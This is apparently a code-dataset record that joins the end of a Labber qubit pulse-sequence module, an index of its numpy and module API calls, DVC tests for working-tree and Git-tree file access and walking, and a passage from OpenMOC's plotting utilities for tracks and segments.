config.get('Ec #{}'.format(m)),
config.get('Vperiod #{}'.format(m)),
config.get('Voffset #{}'.format(m)),
config.get('V0 #{}'.format(m)),
)
self.qubits[n] = qubit
# single-qubit pulses XY
for n, pulse in enumerate(self.pulses_1qb_xy):
m = n + 1 # pulses are indexed from 1 in Labber
pulse = (getattr(pulses, config.get('Pulse type'))(complex=True))
# global parameters
pulse.truncation_range = config.get('Truncation range')
pulse.start_at_zero = config.get('Start at zero')
pulse.use_drag = config.get('Use DRAG')
# pulse shape
if config.get('Uniform pulse shape'):
pulse.width = config.get('Width')
pulse.plateau = config.get('Plateau')
else:
pulse.width = config.get('Width #%d' % m)
pulse.plateau = config.get('Plateau #%d' % m)
if config.get('Uniform amplitude'):
pulse.amplitude = config.get('Amplitude')
else:
pulse.amplitude = config.get('Amplitude #%d' % m)
# pulse-specific parameters
pulse.frequency = config.get('Frequency #%d' % m)
pulse.drag_coefficient = config.get('DRAG scaling #%d' % m)
pulse.drag_detuning = config.get('DRAG frequency detuning #%d' % m)
self.pulses_1qb_xy[n] = pulse
# single-qubit pulses Z
for n, pulse in enumerate(self.pulses_1qb_z):
# pulses are indexed from 1 in Labber
m = n + 1
# global parameters
pulse = (getattr(pulses,
config.get('Pulse type, Z'))(complex=False))
pulse.truncation_range = config.get('Truncation range, Z')
pulse.start_at_zero = config.get('Start at zero, Z')
# pulse shape
if config.get('Uniform pulse shape, Z'):
pulse.width = config.get('Width, Z')
pulse.plateau = config.get('Plateau, Z')
else:
pulse.width = config.get('Width #%d, Z' % m)
pulse.plateau = config.get('Plateau #%d, Z' % m)
if config.get('Uniform amplitude, Z'):
pulse.amplitude = config.get('Amplitude, Z')
else:
pulse.amplitude = config.get('Amplitude #%d, Z' % m)
self.pulses_1qb_z[n] = pulse
# two-qubit pulses
for n, pulse in enumerate(self.pulses_2qb):
# pulses are indexed from 1 in Labber
s = ' #%d%d' % (n + 1, n + 2)
# global parameters
pulse = (getattr(pulses,
config.get('Pulse type, 2QB'))(complex=False))
if config.get('Pulse type, 2QB') in ['CZ', 'NetZero']:
pulse.F_Terms = d[config.get('Fourier terms, 2QB')]
if config.get('Uniform 2QB pulses'):
pulse.width = config.get('Width, 2QB')
pulse.plateau = config.get('Plateau, 2QB')
else:
pulse.width = config.get('Width, 2QB' + s)
pulse.plateau = config.get('Plateau, 2QB')
# spectra
if config.get('Assume linear dependence' + s, True):
pulse.qubit = None
else:
pulse.qubit = self.qubits[n]
# Get Fourier values
if d[config.get('Fourier terms, 2QB')] == 4:
pulse.Lcoeff = np.array([
config.get('L1, 2QB' + s),
config.get('L2, 2QB' + s),
config.get('L3, 2QB' + s),
config.get('L4, 2QB' + s)
])
elif d[config.get('Fourier terms, 2QB')] == 3:
pulse.Lcoeff = np.array([
config.get('L1, 2QB' + s),
config.get('L2, 2QB' + s),
config.get('L3, 2QB' + s)
])
elif d[config.get('Fourier terms, 2QB')] == 2:
pulse.Lcoeff = np.array(
[config.get('L1, 2QB' + s),
config.get('L2, 2QB' + s)])
elif d[config.get('Fourier terms, 2QB')] == 1:
pulse.Lcoeff = np.array([config.get('L1, 2QB' + s)])
pulse.Coupling = config.get('Coupling, 2QB' + s)
pulse.Offset = config.get('f11-f20 initial, 2QB' + s)
pulse.amplitude = config.get('f11-f20 final, 2QB' + s)
pulse.dfdV = config.get('df/dV, 2QB' + s)
pulse.negative_amplitude = config.get('Negative amplitude' + s)
pulse.calculate_cz_waveform()
else:
pulse.truncation_range = config.get('Truncation range, 2QB')
pulse.start_at_zero = config.get('Start at zero, 2QB')
# pulse shape
if config.get('Uniform 2QB pulses'):
pulse.width = config.get('Width, 2QB')
pulse.plateau = config.get('Plateau, 2QB')
else:
pulse.width = config.get('Width, 2QB' + s)
pulse.plateau = config.get('Plateau, 2QB' + s)
# pulse-specific parameters
pulse.amplitude = config.get('Amplitude, 2QB' + s)
gates.CZ.new_angles(
config.get('QB1 Phi 2QB #12'), config.get('QB2 Phi 2QB #12'))
gates.CR.update_params(config.get('CR amplitude'), config.get('CR phase'), config.get('CR frequency'), 0, config.get('CR length'), config.get('CR cancelation amplitude'), config.get('CR cancelation phase'), np.pi/2, 0, np.pi/2)
self.pulses_2qb[n] = pulse
# predistortion
self.perform_predistortion = config.get('Predistort waveforms', False)
# update all predistorting objects
for p in self._predistortions:
p.set_parameters(config)
# Z predistortion
self.perform_predistortion_z = config.get('Predistort Z')
for p in self._predistortions_z:
p.set_parameters(config)
# crosstalk
self.compensate_crosstalk = config.get('Compensate cross-talk', False)
self._crosstalk.set_parameters(config)
# gate switch waveform
self.generate_gate_switch = config.get('Generate gate')
self.uniform_gate = config.get('Uniform gate')
self.gate_delay = config.get('Gate delay')
self.gate_overlap = config.get('Gate overlap')
self.minimal_gate_time = config.get('Minimal gate time')
# filters
self.use_gate_filter = config.get('Filter gate waveforms', False)
self.gate_filter = config.get('Gate filter', 'Kaiser')
self.gate_filter_size = int(config.get('Gate - Filter size', 5))
self.gate_filter_kaiser_beta = config.get(
'Gate - Kaiser beta', 14.0)
self.use_z_filter = config.get('Filter Z waveforms', False)
self.z_filter = config.get('Z filter', 'Kaiser')
self.z_filter_size = int(config.get('Z - Filter size', 5))
self.z_filter_kaiser_beta = config.get(
'Z - Kaiser beta', 14.0)
# readout
self.readout_match_main_size = config.get(
'Match main sequence waveform size')
self.readout_i_offset = config.get('Readout offset - I')
self.readout_q_offset = config.get('Readout offset - Q')
self.readout_trig_generate = config.get('Generate readout trig')
self.readout_trig_amplitude = config.get('Readout trig amplitude')
self.readout_trig_duration = config.get('Readout trig duration')
self.readout_predistort = config.get('Predistort readout waveform')
self.readout.set_parameters(config)
# get readout pulse parameters
phases = 2 * np.pi * np.array([
0.8847060, 0.2043214, 0.9426104, 0.6947334, 0.8752361, 0.2246747,
0.6503154, 0.7305004, 0.1309068
])
for n, pulse in enumerate(self.pulses_readout):
# pulses are indexed from 1 in Labber
m = n + 1
pulse = (getattr(pulses,
config.get('Readout pulse type'))(complex=True))
pulse.truncation_range = config.get('Readout truncation range')
pulse.start_at_zero = config.get('Readout start at zero')
pulse.iq_skew = config.get('Readout IQ skew') * np.pi / 180
pulse.iq_ratio = config.get('Readout I/Q ratio')
if config.get('Distribute readout phases'):
pulse.phase = phases[n]
else:
pulse.phase = 0
if config.get('Uniform readout pulse shape'):
pulse.width = config.get('Readout width')
pulse.plateau = config.get('Readout duration')
else:
pulse.width = config.get('Readout width #%d' % m)
pulse.plateau = config.get('Readout duration #%d' % m)
if config.get('Uniform readout amplitude') is True:
pulse.amplitude = config.get('Readout amplitude')
else:
pulse.amplitude = config.get('Readout amplitude #%d' % (n + 1))
pulse.frequency = config.get('Readout frequency #%d' % m)
self.pulses_readout[n] = pulse
# Delays
self.wave_xy_delays = np.zeros(self.n_qubit)
self.wave_z_delays = np.zeros(self.n_qubit)
for n in range(self.n_qubit):
m = n + 1
self.wave_xy_delays[n] = config.get('Qubit %d XY Delay' % m)
self.wave_z_delays[n] = config.get('Qubit %d Z Delay' % m)
if __name__ == '__main__':
pass
|
[
"numpy.kaiser",
"numpy.sum",
"readout.Demodulation",
"numpy.abs",
"numpy.floor",
"numpy.ones",
"numpy.arange",
"numpy.convolve",
"numpy.round",
"predistortion.Predistortion",
"tomography.StateTomography",
"numpy.zeros_like",
"crosstalk.Crosstalk",
"numpy.max",
"tomography.ProcessTomography",
"gates.ReadoutGate",
"numpy.hanning",
"numpy.ones_like",
"numpy.ceil",
"gates.IdentityGate",
"numpy.hamming",
"gates.CustomGate",
"numpy.min",
"predistortion.ExponentialPredistortion",
"numpy.blackman",
"qubits.Qubit",
"numpy.zeros",
"copy.copy",
"numpy.nonzero",
"numpy.diff",
"numpy.array",
"logging.getLogger"
] |
[((232, 265), 'logging.getLogger', 'logging.getLogger', (['"""LabberDriver"""'], {}), "('LabberDriver')\n", (249, 265), False, 'import logging\n'), ((5054, 5084), 'tomography.ProcessTomography', 'tomography.ProcessTomography', ([], {}), '()\n', (5082, 5084), False, 'import tomography\n'), ((5192, 5220), 'tomography.StateTomography', 'tomography.StateTomography', ([], {}), '()\n', (5218, 5220), False, 'import tomography\n'), ((7377, 7400), 'gates.CustomGate', 'gates.CustomGate', (['pulse'], {}), '(pulse)\n', (7393, 7400), False, 'import gates\n'), ((16514, 16536), 'numpy.zeros', 'np.zeros', (['self.n_qubit'], {}), '(self.n_qubit)\n', (16522, 16536), True, 'import numpy as np\n'), ((16566, 16588), 'numpy.zeros', 'np.zeros', (['self.n_qubit'], {}), '(self.n_qubit)\n', (16574, 16588), True, 'import numpy as np\n'), ((16965, 16986), 'crosstalk.Crosstalk', 'crosstalk.Crosstalk', ([], {}), '()\n', (16984, 16986), False, 'import crosstalk\n'), ((17754, 17788), 'readout.Demodulation', 'readout.Demodulation', (['self.n_qubit'], {}), '(self.n_qubit)\n', (17774, 17788), False, 'import readout\n'), ((17817, 17842), 'numpy.array', 'np.array', (['[]'], {'dtype': 'float'}), '([], dtype=float)\n', (17825, 17842), True, 'import numpy as np\n'), ((17869, 17899), 'numpy.array', 'np.array', (['[]'], {'dtype': 'np.complex'}), '([], dtype=np.complex)\n', (17877, 17899), True, 'import numpy as np\n'), ((33956, 33991), 'numpy.convolve', 'np.convolve', (['s', 'window'], {'mode': '"""same"""'}), "(s, window, mode='same')\n", (33967, 33991), True, 'import numpy as np\n'), ((34511, 34541), 'numpy.zeros_like', 'np.zeros_like', (['self.readout_iq'], {}), '(self.readout_iq)\n', (34524, 34541), True, 'import numpy as np\n'), ((35119, 35198), 'numpy.min', 'np.min', (['[self.wave_xy_delays[:self.n_qubit], self.wave_z_delays[:self.n_qubit]]'], {}), '([self.wave_xy_delays[:self.n_qubit], self.wave_z_delays[:self.n_qubit]])\n', (35125, 35198), True, 'import numpy as np\n'), ((35334, 35413), 'numpy.max', 'np.max', (['[self.wave_xy_delays[:self.n_qubit], self.wave_z_delays[:self.n_qubit]]'], {}), '([self.wave_xy_delays[:self.n_qubit], self.wave_z_delays[:self.n_qubit]])\n', (35340, 35413), True, 'import numpy as np\n'), ((37333, 37374), 'numpy.zeros', 'np.zeros', (['self.n_pts_readout'], {'dtype': 'float'}), '(self.n_pts_readout, dtype=float)\n', (37341, 37374), True, 'import numpy as np\n'), ((37401, 37447), 'numpy.zeros', 'np.zeros', (['self.n_pts_readout'], {'dtype': 'np.complex'}), '(self.n_pts_readout, dtype=np.complex)\n', (37409, 37447), True, 'import numpy as np\n'), ((54003, 54025), 'numpy.zeros', 'np.zeros', (['self.n_qubit'], {}), '(self.n_qubit)\n', (54011, 54025), True, 'import numpy as np\n'), ((54055, 54077), 'numpy.zeros', 'np.zeros', (['self.n_qubit'], {}), '(self.n_qubit)\n', (54063, 54077), True, 'import numpy as np\n'), ((6211, 6255), 'gates.IdentityGate', 'gates.IdentityGate', ([], {'width': 'self.readout_delay'}), '(width=self.readout_delay)\n', (6229, 6255), False, 'import gates\n'), ((6331, 6350), 'gates.ReadoutGate', 'gates.ReadoutGate', ([], {}), '()\n', (6348, 6350), False, 'import gates\n'), ((16103, 16117), 'qubits.Qubit', 'qubits.Qubit', ([], {}), '()\n', (16115, 16117), False, 'import qubits\n'), ((16207, 16236), 'numpy.zeros', 'np.zeros', (['(0)'], {'dtype': 'np.complex'}), '(0, dtype=np.complex)\n', (16215, 16236), True, 'import numpy as np\n'), ((16346, 16357), 'numpy.zeros', 'np.zeros', (['(0)'], {}), '(0)\n', (16354, 16357), True, 'import numpy as np\n'), ((16415, 16426), 'numpy.zeros', 
'np.zeros', (['(0)'], {}), '(0)\n', (16423, 16426), True, 'import numpy as np\n'), ((17100, 17130), 'predistortion.Predistortion', 'predistortion.Predistortion', (['n'], {}), '(n)\n', (17127, 17130), False, 'import predistortion\n'), ((17217, 17258), 'predistortion.ExponentialPredistortion', 'predistortion.ExponentialPredistortion', (['n'], {}), '(n)\n', (17255, 17258), False, 'import predistortion\n'), ((19695, 19734), 'numpy.sum', 'np.sum', (['self._wave_xy[:self.n_qubit]', '(0)'], {}), '(self._wave_xy[:self.n_qubit], 0)\n', (19701, 19734), True, 'import numpy as np\n'), ((22141, 22181), 'numpy.max', 'np.max', (['[x.duration for x in step.gates]'], {}), '([x.duration for x in step.gates])\n', (22147, 22181), True, 'import numpy as np\n'), ((32788, 32801), 'numpy.ones', 'np.ones', (['size'], {}), '(size)\n', (32795, 32801), True, 'import numpy as np\n'), ((34637, 34725), 'numpy.min', 'np.min', (['(start + self.readout_trig_duration * self.sample_rate, self.n_pts_readout)'], {}), '((start + self.readout_trig_duration * self.sample_rate, self.\n n_pts_readout))\n', (34643, 34725), True, 'import numpy as np\n'), ((36369, 36407), 'numpy.zeros', 'np.zeros', (['self.n_pts'], {'dtype': 'np.complex'}), '(self.n_pts, dtype=np.complex)\n', (36377, 36407), True, 'import numpy as np\n'), ((36499, 36532), 'numpy.zeros', 'np.zeros', (['self.n_pts'], {'dtype': 'float'}), '(self.n_pts, dtype=float)\n', (36507, 36532), True, 'import numpy as np\n'), ((36566, 36599), 'numpy.zeros', 'np.zeros', (['self.n_pts'], {'dtype': 'float'}), '(self.n_pts, dtype=float)\n', (36574, 36599), True, 'import numpy as np\n'), ((36649, 36670), 'numpy.arange', 'np.arange', (['self.n_pts'], {}), '(self.n_pts)\n', (36658, 36670), True, 'import numpy as np\n'), ((52464, 52577), 'numpy.array', 'np.array', (['[0.884706, 0.2043214, 0.9426104, 0.6947334, 0.8752361, 0.2246747, 0.6503154,\n 0.7305004, 0.1309068]'], {}), '([0.884706, 0.2043214, 0.9426104, 0.6947334, 0.8752361, 0.2246747, \n 0.6503154, 0.7305004, 0.1309068])\n', (52472, 52577), True, 'import numpy as np\n'), ((29150, 29168), 'numpy.ones_like', 'np.ones_like', (['wave'], {}), '(wave)\n', (29162, 29168), True, 'import numpy as np\n'), ((29730, 29743), 'numpy.diff', 'np.diff', (['gate'], {}), '(gate)\n', (29737, 29743), True, 'import numpy as np\n'), ((30227, 30240), 'numpy.diff', 'np.diff', (['gate'], {}), '(gate)\n', (30234, 30240), True, 'import numpy as np\n'), ((34386, 34403), 'numpy.round', 'np.round', (['(t / acc)'], {}), '(t / acc)\n', (34394, 34403), True, 'import numpy as np\n'), ((29654, 29700), 'numpy.round', 'np.round', (['(self.gate_overlap * self.sample_rate)'], {}), '(self.gate_overlap * self.sample_rate)\n', (29662, 29700), True, 'import numpy as np\n'), ((29770, 29797), 'numpy.nonzero', 'np.nonzero', (['(diff_gate > 0.0)'], {}), '(diff_gate > 0.0)\n', (29780, 29797), True, 'import numpy as np\n'), ((29829, 29856), 'numpy.nonzero', 'np.nonzero', (['(diff_gate < 0.0)'], {}), '(diff_gate < 0.0)\n', (29839, 29856), True, 'import numpy as np\n'), ((30267, 30294), 'numpy.nonzero', 'np.nonzero', (['(diff_gate > 0.0)'], {}), '(diff_gate > 0.0)\n', (30277, 30294), True, 'import numpy as np\n'), ((30326, 30353), 'numpy.nonzero', 'np.nonzero', (['(diff_gate < 0.0)'], {}), '(diff_gate < 0.0)\n', (30336, 30353), True, 'import numpy as np\n'), ((30690, 30754), 'numpy.nonzero', 'np.nonzero', (['(len_down < self.minimal_gate_time * self.sample_rate)'], {}), '(len_down < self.minimal_gate_time * self.sample_rate)\n', (30700, 30754), True, 'import numpy as np\n'), ((30957, 
31001), 'numpy.round', 'np.round', (['(self.gate_delay * self.sample_rate)'], {}), '(self.gate_delay * self.sample_rate)\n', (30965, 31001), True, 'import numpy as np\n'), ((33033, 33054), 'numpy.blackman', 'np.blackman', (['(size + 2)'], {}), '(size + 2)\n', (33044, 33054), True, 'import numpy as np\n'), ((35726, 35771), 'numpy.max', 'np.max', (['[s.t_end for s in self.sequence_list]'], {}), '([s.t_end for s in self.sequence_list])\n', (35732, 35771), True, 'import numpy as np\n'), ((35936, 35987), 'numpy.max', 'np.max', (['[s.t_end for s in self.sequence_list[0:-1]]'], {}), '([s.t_end for s in self.sequence_list[0:-1]])\n', (35942, 35987), True, 'import numpy as np\n'), ((36138, 36169), 'numpy.ceil', 'np.ceil', (['(end * self.sample_rate)'], {}), '(end * self.sample_rate)\n', (36145, 36169), True, 'import numpy as np\n'), ((37026, 37122), 'numpy.ceil', 'np.ceil', (['(self.sample_rate * (self.sequence_list[-1].t_end - self.sequence_list[-1].\n t_start))'], {}), '(self.sample_rate * (self.sequence_list[-1].t_end - self.\n sequence_list[-1].t_start))\n', (37033, 37122), True, 'import numpy as np\n'), ((28616, 28635), 'copy.copy', 'copy.copy', (['gate_obj'], {}), '(gate_obj)\n', (28625, 28635), False, 'import copy\n'), ((29554, 29566), 'numpy.abs', 'np.abs', (['wave'], {}), '(wave)\n', (29560, 29566), True, 'import numpy as np\n'), ((33129, 33145), 'numpy.hamming', 'np.hamming', (['size'], {}), '(size)\n', (33139, 33145), True, 'import numpy as np\n'), ((31127, 31147), 'numpy.zeros', 'np.zeros', (['(n_shift,)'], {}), '((n_shift,))\n', (31135, 31147), True, 'import numpy as np\n'), ((33196, 33216), 'numpy.hanning', 'np.hanning', (['(size + 2)'], {}), '(size + 2)\n', (33206, 33216), True, 'import numpy as np\n'), ((34559, 34582), 'numpy.abs', 'np.abs', (['self.readout_iq'], {}), '(self.readout_iq)\n', (34565, 34582), True, 'import numpy as np\n'), ((41886, 41920), 'numpy.floor', 'np.floor', (['(start * self.sample_rate)'], {}), '(start * self.sample_rate)\n', (41894, 41920), True, 'import numpy as np\n'), ((41954, 41985), 'numpy.ceil', 'np.ceil', (['(end * self.sample_rate)'], {}), '(end * self.sample_rate)\n', (41961, 41985), True, 'import numpy as np\n'), ((31217, 31237), 'numpy.zeros', 'np.zeros', (['(n_shift,)'], {}), '((n_shift,))\n', (31225, 31237), True, 'import numpy as np\n'), ((33290, 33318), 'numpy.kaiser', 'np.kaiser', (['size', 'kaiser_beta'], {}), '(size, kaiser_beta)\n', (33299, 33318), True, 'import numpy as np\n'), ((40450, 40484), 'numpy.floor', 'np.floor', (['(start * self.sample_rate)'], {}), '(start * self.sample_rate)\n', (40458, 40484), True, 'import numpy as np\n'), ((40555, 40586), 'numpy.ceil', 'np.ceil', (['(end * self.sample_rate)'], {}), '(end * self.sample_rate)\n', (40562, 40586), True, 'import numpy as np\n')]
|
# encoding: utf-8
from __future__ import unicode_literals
from os.path import join
from dvc.scm import SCM
from dvc.scm.git import GitTree
from dvc.scm.tree import WorkingTree
from tests.basic_env import TestDir, TestGit
class TestWorkingTree(TestDir):
def setUp(self):
super(TestWorkingTree, self).setUp()
self.tree = WorkingTree()
def test_open(self):
self.assertEqual(self.tree.open(self.FOO).read(), self.FOO_CONTENTS)
self.assertEqual(
self.tree.open(self.UNICODE).read(), self.UNICODE_CONTENTS
)
def test_exists(self):
self.assertTrue(self.tree.exists(self.FOO))
self.assertTrue(self.tree.exists(self.UNICODE))
self.assertFalse(self.tree.exists("not-existing-file"))
def test_isdir(self):
self.assertTrue(self.tree.isdir(self.DATA_DIR))
self.assertFalse(self.tree.isdir(self.FOO))
self.assertFalse(self.tree.isdir("not-existing-file"))
def test_isfile(self):
self.assertTrue(self.tree.isfile(self.FOO))
self.assertFalse(self.tree.isfile(self.DATA_DIR))
self.assertFalse(self.tree.isfile("not-existing-file"))
class TestGitTree(TestGit):
def setUp(self):
super(TestGitTree, self).setUp()
self.scm = SCM(self._root_dir)
self.tree = GitTree(self.git, "master")
def test_open(self):
self.scm.add([self.FOO, self.UNICODE, self.DATA_DIR])
self.scm.commit("add")
self.assertEqual(self.tree.open(self.FOO).read(), self.FOO_CONTENTS)
self.assertEqual(
self.tree.open(self.UNICODE).read(), self.UNICODE_CONTENTS
)
with self.assertRaises(IOError):
self.tree.open("not-existing-file")
with self.assertRaises(IOError):
self.tree.open(self.DATA_DIR)
def test_exists(self):
self.assertFalse(self.tree.exists(self.FOO))
self.assertFalse(self.tree.exists(self.UNICODE))
self.assertFalse(self.tree.exists(self.DATA_DIR))
self.scm.add([self.FOO, self.UNICODE, self.DATA])
self.scm.commit("add")
self.assertTrue(self.tree.exists(self.FOO))
self.assertTrue(self.tree.exists(self.UNICODE))
self.assertTrue(self.tree.exists(self.DATA_DIR))
self.assertFalse(self.tree.exists("non-existing-file"))
def test_isdir(self):
self.scm.add([self.FOO, self.DATA_DIR])
self.scm.commit("add")
self.assertTrue(self.tree.isdir(self.DATA_DIR))
self.assertFalse(self.tree.isdir(self.FOO))
self.assertFalse(self.tree.isdir("non-existing-file"))
def test_isfile(self):
self.scm.add([self.FOO, self.DATA_DIR])
self.scm.commit("add")
self.assertTrue(self.tree.isfile(self.FOO))
self.assertFalse(self.tree.isfile(self.DATA_DIR))
self.assertFalse(self.tree.isfile("not-existing-file"))
class AssertWalkEqualMixin(object):
def assertWalkEqual(self, actual, expected, msg=None):
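        # Compare os.walk-style results while ignoring the order of the
        # directory and file names within each directory.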
def convert_to_sets(walk_results):
return [
(root, set(dirs), set(nondirs))
for root, dirs, nondirs in walk_results
]
self.assertEqual(
convert_to_sets(actual), convert_to_sets(expected), msg=msg
)
class TestWalkInNoSCM(AssertWalkEqualMixin, TestDir):
def test(self):
tree = WorkingTree()
self.assertWalkEqual(
tree.walk("."),
[
(".", ["data_dir"], ["code.py", "bar", "тест", "foo"]),
(join("data_dir"), ["data_sub_dir"], ["data"]),
(join("data_dir", "data_sub_dir"), [], ["data_sub"]),
],
)
def test_subdir(self):
tree = WorkingTree()
self.assertWalkEqual(
tree.walk(join("data_dir", "data_sub_dir")),
[(join("data_dir", "data_sub_dir"), [], ["data_sub"])],
)
class TestWalkInGit(AssertWalkEqualMixin, TestGit):
def test_nobranch(self):
tree = WorkingTree()
self.assertWalkEqual(
tree.walk("."),
[
(".", ["data_dir"], ["bar", "тест", "code.py", "foo"]),
("data_dir", ["data_sub_dir"], ["data"]),
(join("data_dir", "data_sub_dir"), [], ["data_sub"]),
],
)
self.assertWalkEqual(
tree.walk(join("data_dir", "data_sub_dir")),
[(join("data_dir", "data_sub_dir"), [], ["data_sub"])],
)
def test_branch(self):
scm = SCM(self._root_dir)
scm.add([self.DATA_SUB_DIR])
scm.commit("add data_dir/data_sub_dir/data_sub")
tree = GitTree(self.git, "master")
self.assertWalkEqual(
tree.walk("."),
[
(".", ["data_dir"], ["code.py"]),
("data_dir", ["data_sub_dir"], []),
(join("data_dir", "data_sub_dir"), [], ["data_sub"]),
],
)
self.assertWalkEqual(
tree.walk(join("data_dir", "data_sub_dir")),
[(join("data_dir", "data_sub_dir"), [], ["data_sub"])],
)
|
[
"dvc.scm.git.GitTree",
"os.path.join",
"dvc.scm.tree.WorkingTree",
"dvc.scm.SCM"
] |
[((345, 358), 'dvc.scm.tree.WorkingTree', 'WorkingTree', ([], {}), '()\n', (356, 358), False, 'from dvc.scm.tree import WorkingTree\n'), ((1280, 1299), 'dvc.scm.SCM', 'SCM', (['self._root_dir'], {}), '(self._root_dir)\n', (1283, 1299), False, 'from dvc.scm import SCM\n'), ((1320, 1347), 'dvc.scm.git.GitTree', 'GitTree', (['self.git', '"""master"""'], {}), "(self.git, 'master')\n", (1327, 1347), False, 'from dvc.scm.git import GitTree\n'), ((3374, 3387), 'dvc.scm.tree.WorkingTree', 'WorkingTree', ([], {}), '()\n', (3385, 3387), False, 'from dvc.scm.tree import WorkingTree\n'), ((3734, 3747), 'dvc.scm.tree.WorkingTree', 'WorkingTree', ([], {}), '()\n', (3745, 3747), False, 'from dvc.scm.tree import WorkingTree\n'), ((4011, 4024), 'dvc.scm.tree.WorkingTree', 'WorkingTree', ([], {}), '()\n', (4022, 4024), False, 'from dvc.scm.tree import WorkingTree\n'), ((4529, 4548), 'dvc.scm.SCM', 'SCM', (['self._root_dir'], {}), '(self._root_dir)\n', (4532, 4548), False, 'from dvc.scm import SCM\n'), ((4658, 4685), 'dvc.scm.git.GitTree', 'GitTree', (['self.git', '"""master"""'], {}), "(self.git, 'master')\n", (4665, 4685), False, 'from dvc.scm.git import GitTree\n'), ((3800, 3832), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (3804, 3832), False, 'from os.path import join\n'), ((4374, 4406), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (4378, 4406), False, 'from os.path import join\n'), ((5007, 5039), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (5011, 5039), False, 'from os.path import join\n'), ((3549, 3565), 'os.path.join', 'join', (['"""data_dir"""'], {}), "('data_dir')\n", (3553, 3565), False, 'from os.path import join\n'), ((3613, 3645), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (3617, 3645), False, 'from os.path import join\n'), ((3849, 3881), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (3853, 3881), False, 'from os.path import join\n'), ((4244, 4276), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (4248, 4276), False, 'from os.path import join\n'), ((4423, 4455), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (4427, 4455), False, 'from os.path import join\n'), ((4877, 4909), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (4881, 4909), False, 'from os.path import join\n'), ((5056, 5088), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (5060, 5088), False, 'from os.path import join\n')]
|
#
# @file plotter.py
# @package openmoc.plotter
# @brief The plotter module provides utility functions to plot data from
#        OpenMOC's C++ classes, in particular, the geometry, including Materials,
# Cells and flat source regions, and fluxes and pin powers.
# @author <NAME> (<EMAIL>)
# @date March 10, 2013
import os
import sys
import numpy as np
import numpy.random
import matplotlib
# force headless backend, or set 'backend' to 'Agg'
# in your ~/.matplotlib/matplotlibrc
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib.cm as cmx
import openmoc
# For Python 2.X.X
if (sys.version_info[0] == 2):
from log import *
from process import *
# For Python 3.X.X
else:
from openmoc.log import *
from openmoc.process import *
# Force non-interactive mode, or set 'interactive' to False
# in your ~/.matplotlib/matplotlibrc
plt.ioff()
## A static variable for the output directory in which to save plots
subdirectory = "/plots/"
TINY_MOVE = openmoc.TINY_MOVE
##
# @brief Plots the characteristic tracks from an OpenMOC simulation.
# @details This method requires that Tracks have been generated by a
# TrackGenerator object. A user may invoke this function from
# an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_tracks(track_generator)
# @endcode
#
# @param track_generator the TrackGenerator which has generated Tracks
def plot_tracks(track_generator):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'TrackGenerator' in str(type(track_generator)):
py_printf('ERROR', 'Unable to plot Tracks since %s was input rather ' + \
'than a TrackGenerator', str(type(track_generator)))
if not track_generator.containsTracks():
py_printf('ERROR', 'Unable to plot Tracks since the track ' + \
'generator has not yet generated tracks')
py_printf('NORMAL', 'Plotting the tracks...')
# Retrieve data from TrackGenerator
vals_per_track = openmoc.NUM_VALUES_PER_RETRIEVED_TRACK
num_azim = track_generator.getNumAzim()
spacing = track_generator.getTrackSpacing()
num_tracks = track_generator.getNumTracks()
coords = track_generator.retrieveTrackCoords(num_tracks*vals_per_track)
# Convert data to NumPy arrays
coords = np.array(coords)
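    # Each Track contributes two end points, so stepping by half of
    # vals_per_track below interleaves the start/end coordinates:
    # (x[2*i], y[2*i]) and (x[2*i+1], y[2*i+1]) belong to Track i.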
    x = coords[0::vals_per_track//2]
    y = coords[1::vals_per_track//2]
# Make figure of line segments for each Track
fig = plt.figure()
for i in range(num_tracks):
plt.plot([x[i*2], x[i*2+1]], [y[i*2], y[i*2+1]], 'b-')
plt.xlim([x.min(), x.max()])
plt.ylim([y.min(), y.max()])
title = 'Tracks for ' + str(num_azim) + ' angles and ' + str(spacing) + \
' cm spacing'
plt.title(title)
filename = directory + 'tracks-' + str(num_azim) + '-angles-' + \
str(spacing) + '-spacing.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief Plots the characteristic Track segments from an OpenMOC simulation.
# @details This method requires that tracks have been generated by a
# TrackGenerator object. Each segment is colored by the ID of the
#          unique flat source region it is within. A user may invoke
# this function from an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_segments(track_generator)
# @endcode
#
# @param track_generator the TrackGenerator which has generated Tracks
def plot_segments(track_generator):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'TrackGenerator' in str(type(track_generator)):
py_printf('ERROR', 'Unable to plot Track segments since %s was input ' + \
'rather than a TrackGenerator', str(type(track_generator)))
if not track_generator.containsTracks():
py_printf('ERROR', 'Unable to plot Track segments since the ' + \
'TrackGenerator has not yet generated Tracks.')
py_printf('NORMAL', 'Plotting the track segments...')
# Retrieve data from TrackGenerator
vals_per_segment = openmoc.NUM_VALUES_PER_RETRIEVED_SEGMENT
num_azim = track_generator.getNumAzim()
spacing = track_generator.getTrackSpacing()
num_segments = track_generator.getNumSegments()
num_fsrs = track_generator.getGeometry().getNumFSRs()
coords = track_generator.retrieveSegmentCoords(num_segments*vals_per_segment)
# Convert data to NumPy arrays
coords = np.array(coords)
x = numpy.zeros(num_segments*2)
y = numpy.zeros(num_segments*2)
z = numpy.zeros(num_segments*2)
